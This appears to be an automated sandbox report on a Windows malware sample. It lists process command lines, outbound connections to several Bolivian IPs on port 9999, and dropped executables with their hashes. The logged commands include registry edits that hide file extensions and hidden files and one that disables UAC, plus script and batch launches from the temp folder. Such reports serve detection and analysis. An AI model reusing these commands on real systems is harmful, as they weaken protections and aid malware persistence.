C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AKEskEcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEEEAMME.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

Network

Country  Destination            Domain                         Proto
BO       200.87.164.69:9999     N/A                            tcp
US       8.8.8.8:53             google.com                     udp
BO       200.87.164.69:9999     N/A                            tcp
GB       172.217.16.238:80      google.com                     tcp
GB       172.217.16.238:80      google.com                     tcp
US       8.8.8.8:53             58.55.71.13.in-addr.arpa       udp
US       8.8.8.8:53             238.16.217.172.in-addr.arpa    udp
US       8.8.8.8:53             76.32.126.40.in-addr.arpa      udp
US       8.8.8.8:53             95.221.229.192.in-addr.arpa    udp
US       8.8.8.8:53             241.150.49.20.in-addr.arpa     udp
US       8.8.8.8:53             57.169.31.20.in-addr.arpa      udp
US       8.8.8.8:53             149.220.183.52.in-addr.arpa    udp
BO       200.119.204.12:9999    N/A                            tcp
BO       200.119.204.12:9999    N/A                            tcp
US       8.8.8.8:53             197.87.175.4.in-addr.arpa      udp
US       8.8.8.8:53             198.187.3.20.in-addr.arpa      udp
US       8.8.8.8:53             110.11.19.2.in-addr.arpa       udp
BO       190.186.45.170:9999    N/A                            tcp
BO       190.186.45.170:9999    N/A                            tcp
US       8.8.8.8:53             226.108.222.173.in-addr.arpa   udp
US       8.8.8.8:53             11.227.111.52.in-addr.arpa     udp
US       8.8.8.8:53             tse1.mm.bing.net               udp
US       150.171.27.10:443      tse1.mm.bing.net               tcp
US       150.171.27.10:443      tse1.mm.bing.net               tcp
US       150.171.27.10:443      tse1.mm.bing.net               tcp
US       150.171.27.10:443      tse1.mm.bing.net               tcp
US       150.171.27.10:443      tse1.mm.bing.net               tcp
US       8.8.8.8:53             205.47.74.20.in-addr.arpa      udp
US       8.8.8.8:53             10.27.171.150.in-addr.arpa     udp
US       8.8.8.8:53             174.117.168.52.in-addr.arpa    udp

Files

memory/2008-0-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3392-5-0x0000000000400000-0x000000000041D000-memory.dmp

C:\Users\Admin\mSgYkYQw\lWwscwwc.exe

MD5 170696f6d60b6c2b4aa857aaa68a7002
SHA1 c8832ba66a7ceedffde830aee29aac83404eb9bf
SHA256 090ff5e07cfbdbe0c5f58fd88e9dd4225efb29f7ef14fffabe8dc73706b9ed1b
SHA512 1bf4a449ea202ef972bc5147437bddd2e50b452436fb60634c64619f03f2846ae94194a179b5420f82ee4e863a4bad3165519af49cb5ce663664fb357adfb0a7

C:\ProgramData\RogQUwEA\IOcYUcsQ.exe

MD5 ce4649abb9a7ba9ef67dd5526f9e7c72
SHA1 bd8f91bfe17fd00456954ce00994c4e19238dae7
SHA256 8501237e21ed0a6361b32a09840af55faaf1858577405a7285f1b51f122c3ac4
SHA512 23a6c632e97b88fc519b7ea407c423395a4b10b88742f85bdc7f966fc48edaeaaebb767fae5e0ba8ea23f02fa0f1367f1e740afadd6a1161584282ec72a01732

memory/3964-15-0x0000000000400000-0x000000000041D000-memory.dmp

memory/2008-19-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

MD5 62eb5f8af13f0886f278614f5f43e21f
SHA1 7a0387dc6c5f9c31c18196fb860dd50a7a3e9c71
SHA256 ec3e84ad90487122ba0eba5945de8a2ca2b10ffc16b3a02746def24e926148b4
SHA512 7c5008c846420519589a99f04d6e5421f895c18cba00d3ae43cefadc594b185dfce5d21942cc67d0ab0e0666b6bab497e368ceeea87db8c35bcee8342d827c80

C:\Users\Admin\AppData\Local\Temp\cmAQsAAI.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

memory/228-29-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3024-41-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3928-52-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4396-63-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2208-74-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3668-85-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4768-86-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3668-97-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4796-108-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4588-119-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1020-130-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5072-141-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1112-152-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3656-163-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4380-171-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2972-175-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2544-183-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4380-187-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2544-198-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1904-209-0x0000000000400000-0x000000000041F000-memory.dmp

memory/228-220-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1984-232-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4276-231-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4276-243-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3116-251-0x0000000000400000-0x000000000041F000-memory.dmp

memory/648-252-0x0000000000400000-0x000000000041F000-memory.dmp

memory/648-260-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2412-268-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1560-276-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4804-284-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4556-285-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4556-293-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2448-301-0x0000000000400000-0x000000000041F000-memory.dmp

memory/736-309-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1240-314-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4536-318-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1240-326-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4200-334-0x0000000000400000-0x000000000041F000-memory.dmp

memory/928-342-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3796-350-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4660-355-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2388-359-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4660-367-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3160-375-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4124-383-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3868-391-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4392-399-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5112-407-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4356-415-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3052-423-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1424-431-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4384-439-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1844-447-0x0000000000400000-0x000000000041F000-memory.dmp

memory/652-455-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4300-463-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4396-471-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2060-479-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4500-487-0x0000000000400000-0x000000000041F000-memory.dmp

memory/244-492-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2712-496-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xUkA.exe

MD5 9c287847ded76e3ef7b350dc9b9296f5
SHA1 b10e6b44e86296444bf309bc132636976dd7b0bb
SHA256 83b09bbe1aa759b67746405ba883c783e4b9855fa41943ec27f2fed1585fad95
SHA512 468b8ed29ad6da8ad6c2d2b4688534c500e8dd68226e062ef7a82cb435f5190ab266fcbba4b36e7c2fb364b361fe23cfd2996a90f217856d6b85a2af4417a321

memory/244-519-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mQkG.exe

MD5 a05b1bf4bd19cac0327f5e83575ab98b
SHA1 91ea05fe30707edf6649614ceba38eeda0a09908
SHA256 042c9694c71ac02d2dff5868507ec071c3a7f6b53d2e7bb802436dbb0a11c5fa
SHA512 19abc343fbb2be4555956ad72a558fc36264f45f0ab1adb2557ea898e08e9ff11de0bf2738ab1d346e8a820982ef063677f7b8b0707cdefb30a90ba17eaddbe2

C:\Users\Admin\AppData\Local\Temp\zMwe.exe

MD5 53723caa0b5bea3fa70dbb9eaa913eb5
SHA1 3b146c148d1a3e7ef33456f59d14419945f6394f
SHA256 98c5bbedf1705843b2325caf00affd2caba20b932ae01adf068dc7c575b8a43a
SHA512 f9349d7f97e66191d21c5a64e2e5a85512e144581af63c5f38a43176ec19496c6f68d5dbccc2fbb831dcf5e0ad6ebdfada23a3f39a62e4717cdf7ab0c226d93d

C:\Users\Admin\AppData\Local\Temp\tkEu.ico

MD5 ee421bd295eb1a0d8c54f8586ccb18fa
SHA1 bc06850f3112289fce374241f7e9aff0a70ecb2f
SHA256 57e72b9591e318a17feb74efa1262e9222814ad872437094734295700f669563
SHA512 dfd36dff3742f39858e4a3e781e756f6d8480caa33b715ad1a8293f6ef436cdc84c3d26428230cdac8651c1ee7947b0e5bb3ac1e32c0b7bbb2bfed81375b5897

C:\Users\Admin\AppData\Local\Temp\qEMq.exe

MD5 3a35f27d53e5d3de9c3794b158598855
SHA1 17ad3f44fc2b22067433cb56c46247449806fe0c
SHA256 4d460a4a0a9f74cc860b42f791599fdfb4aae0d15cf75fdef38282bc33428f58
SHA512 befc2e9b64a0238c8f86a4c19371d045951839cf1522c79491ad54478c649137a97a30f3f53b1817d387487efa51e0ba01aae1b4442618fd966e79c6c423e3d6

memory/4736-569-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\VcIg.exe

MD5 1ce251b698213158e296e0fb7e02a4db
SHA1 ad7c422f74b6cfe3e28f58ba01cbb59e2d99752d
SHA256 8180ea748c3ac8cc81959a898473883d4d0aec5eff6585ac53e09e42b2d5ecf0
SHA512 4a0fe8b3416f1e9adf4455ab0c8ee85cd9beaa6e517f6e9edeff7c43bdae7666356ac876f9a95fd2dde800bb498235424e788f3a2ffd943b77b4f9baf57886e1

memory/3424-584-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aQMU.exe

MD5 354975adc55ba12210b057ee4f58f04e
SHA1 b7bb90a738c723e13a59f61d2f804a1adc0ebe1b
SHA256 95abbb1dd98d5445f945e3a5baec3a89ffd53c12cfc01bbee10e2ab1c247229a
SHA512 93b4e61c0c5344d6e2f53562fa1190f577936fb7492131559e2b096af6f9bc9e4d8a80beff99d7f5f613a605ce205c0d28af12940797262b09032a4ab5929197

C:\Users\Admin\AppData\Local\Temp\FUEu.exe

MD5 a5c393f5ff0efe0a75d71ca3d2e255af
SHA1 f4672e96ff824d8f76bc7471e16e98c07192488a
SHA256 4f4c1dd6656b8a25985246949371960810f5e32e99149ba060d4bc77078e4f17
SHA512 4088a0224c85668e2e38579f7dbf05c17fdcc159a92509be1503614ead5f3f5d9df84bda56a778080d5d1571558946e92beb005dfca9a44f4b5df1fce3613616

C:\Users\Admin\AppData\Local\Temp\XoYy.exe

MD5 668bfe757d44d314324313611db90759
SHA1 9ab87cf02f0aabf7400c0f0d5a58a255e4ee528b
SHA256 3884bb7ef9edd30193e5afdcebc2a49ef875d9a565b5e48c78d0b6cbe637347a
SHA512 df49574cb154fc3ca3f384b446dabfc67163a8568dbdb3904cc28a794f39a8fd7a92ba2adb9db62c90db053048c1c0eda8849f017f6caec8abbba66780c5bcdd

C:\Users\Admin\AppData\Local\Temp\dAwk.exe

MD5 b7e398a24048e68f1ee36674e6a9173c
SHA1 cb9703d04a35dddef00d9007a564fbd962107139
SHA256 35b3a54036dd872d5bb649041bbee1b7f2ad7fcb2029113012d4c903f89d639b
SHA512 63bd10d98b106fc986059485bcd68639d2ee991f3c78da0ac337d569fc070499d215cfb1233814aab17ccdec47323973da1fb4e60cbfaf6c87b1cbeaa849699e

memory/3424-648-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ncIG.exe

MD5 392737afbd1053eb810338e003a5cfa8
SHA1 e97f4249550aec1049fea055be87eaa80bbb5bf2
SHA256 8bc319d04d9e04dcad0ff6123dce7598afa941fded8587935a19c2e7a91821c1
SHA512 32349a186218d2eb6c27eac921e28109b93de51062ac4723f7637debc043787fc633ccf7cf55e019496e6c7aa3f1a3dbda47ecf4512ee3bc9e5919003b31ecd5

C:\Users\Admin\AppData\Local\Temp\Usoe.exe

MD5 4d8132968bf93c6ceb2106ff41862585
SHA1 93d1569d0bd7a19517872ac95f9f1f964017da6c
SHA256 87a4a6c08387a4f78006d76fdce53483f746202725858f1393d1e8fb10f4ec11
SHA512 439fdc90ad191328686a501acf89715e8b459deb76d91d525d2c16ce2a23b34eec73fd69fa30af0c3ac4b411cfa31b769880490bf168d9227464803212beb551

C:\Users\Admin\AppData\Local\Temp\tYsY.exe

MD5 326983cd6ba54abc1d05067d8a5b16e7
SHA1 db72ca1363d0f9e234f521e10f700d7ef39876ac
SHA256 36000cfda95dff87715b2152d1bdf000c3c4df7dc7115f50c761e4e9ba0524da
SHA512 52d2e36b9d6670b6974986e3606c15382f73c1a338c6e7ce248e6f5a61f32931339d89dac26f134258b0c67beedb107cf77b26e8933b9d42338a705cb5efc8a5

C:\Users\Admin\AppData\Local\Temp\owYM.exe

MD5 73b2e4d84bc46948ebe4bab4cb46ad00
SHA1 4c7c8247eec44daf6bb218ee9a62023981d48c81
SHA256 b590fcf2e2f6bf3c2e0c55a7d03c14b37cfa24f828ce3eea783e54d1f43377ed
SHA512 b320e702fd5293cb8dcecc5b35c0c9ce18fc272e74dffe9a149ac4d3f5c49765ee8b566d321e4e2920dd56e7caa5daf7aa05bfa5d21f31dab8f3e9a9e975b162

C:\Users\Admin\AppData\Local\Temp\rsos.exe

MD5 e4df7ac4ae24b4d8cd5ad0bd1cf71c35
SHA1 75627e085e241f680d2a6ad343f0ad966706fc3c
SHA256 1ce889d21c0a1e7f01ecc3c15b6844f9ebb69f239f833fc4e0582a42b6ad9021
SHA512 4528fcbcaaa3d77b739426c2c73e3e7d2db0b8d399a462f64a69b8239f4d12c5414e7aa615cbe38bf0af0d7d2648ec4ed225b91927ee04b5ba72924b100cb8f4

memory/1984-726-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\agEm.exe

MD5 2f161a6fe91f445b2aca87ca9497b458
SHA1 a9b307e42a7ea5a3fae57a1c8eb9db9b87a4e5a0
SHA256 aade616b4f87eb00a80d147a545cd4e65dd37d1e6553490706660a3677c469c3
SHA512 5ba14f84ab99b106e5ea2c051a6edd2234279f415f6dd460c8a6f5e229ce20dcdaaec65ad388a9e9be536f313265fdd076a29c97f15e57fb094bc284dbc1f497

C:\Users\Admin\AppData\Local\Temp\XgIA.exe

MD5 75f556cec5e858e112d9c7838de40ab1
SHA1 c8e4b2cec53b64e0cc9455352fb6125007bdaf4a
SHA256 570489877fcd7378ad592f2f220b127b9af9218cedf4e71c6c989c06c3a03ce0
SHA512 2e3b91296cae80863fd6f66d42fb59d284954b1bf6c2a0e86f6f1827ac3770f3752a42a9b94c870375af7881660d86662204e0c5992edf898882793ec9953e6b

memory/900-756-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HIYw.ico

MD5 ac4b56cc5c5e71c3bb226181418fd891
SHA1 e62149df7a7d31a7777cae68822e4d0eaba2199d
SHA256 701a17a9ee5c9340bae4f0810f103d1f0ca5c03141e0da826139d5b7397a6fb3
SHA512 a8136ef9245c8a03a155d831ed9b9d5b126f160cdf3da3214850305d726d5d511145e0c83b817ca1ac7b10abccb47729624867d48fede0c46da06f4ac50cf998

C:\Users\Admin\AppData\Local\Temp\wQEi.exe

MD5 98a3ed6b4082070aa6ed808e1fbc207d
SHA1 e5e4adf34b644f1ff2650aabe4b3b1b404ec2158
SHA256 dff48c446fe38fac532ee7a17145e8269862638ea958eb3dc96265541ebd5fcd
SHA512 8e3d10162bc2286afeda2c87dbf4531da6a8460cf47d517ac956d9a22ceeaa19864a97385b2e967cc4139ade297b44ff842fb14a99fadd3fdaf2a92fff503d78

C:\Users\Admin\AppData\Local\Temp\awsM.exe

MD5 22d9716967583b4e044014dde206d451
SHA1 40ef99da33feef28194b835b8b8be892cf11c5a1
SHA256 97f58073605d25a3cd5f1c4b09d7220767150a1a5457750083609335f93b26f9
SHA512 809dfa18e93bb31d92ccffafe0222986b5c97792795472ef919b98586044d223a0dcef57a1fcdb8d6533e5c55f42b131ec255c75b386b67ba7259fb7fb23352b

C:\Users\Admin\AppData\Local\Temp\DoYO.exe

MD5 6e786cf05a8dc5b9a4cfb317cf527fa8
SHA1 01166523c14faf3b7df73e9870cae4939f77a325
SHA256 f4698fe30a789fceeaf338b9ee934c4b8dd6f9fd0a993efc7ad06cae93019d09